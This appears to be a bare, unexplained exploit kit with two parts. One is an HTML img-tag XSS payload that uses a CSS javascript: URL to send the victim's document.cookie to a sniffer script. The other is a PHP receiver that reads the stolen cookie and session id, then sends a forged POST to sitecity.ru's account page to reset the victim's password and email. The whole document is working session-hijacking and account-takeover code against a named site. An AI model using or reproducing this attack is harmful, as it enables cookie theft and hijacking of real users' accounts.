<img src="http://sasa" style="background:white url(javascript:document.images[0].src='http://sniff/s.php?'+document.cookie)">
<? $nick="PinkPanther";$mail="qwerty@qwerty.ru";$new_password="123456"; $query=$_SERVER["QUERY_STRING"];$query=urldecode($query);$refer=getenv("HTTP_REFERER");$ref1=strpos($refer,"id=")+3; $session=substr($refer,$ref1,32); $post="sid=".$session."&act=send&uname=".$nick."&email=".$m ail."&passwd_1=".$new_password."&passwd_2=".$new_password."&pager_type=non&pager=&lang=rus&gpasswd=&is_news=on&is_notify=on&news_encoding=koi&news_lang=rus&%C8%E7%EC%E5%ED% E8%F2%FC=%C8%E7%EC%E5%ED%E8%F2%FC"; $len=strlen($post); $header="POST http://sitecity.ru/adm_base.phtml HTTP/1.0 ";$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* ";$header.="Referer: http://sitecity.ru/adm_base.phtml?sid=".$session." ";$header.="Content-Type: application/x-www-form-urlencoded ";$header.="Host: sitecity.ru ";$header.="Content-Length: $len ";$header.="Cookie: ".$query." ";$header.=" ";$header.=$post; $fp=fsockopen("sitecity.ru", 80); fwrite($fp, $header); fclose($fp); ?>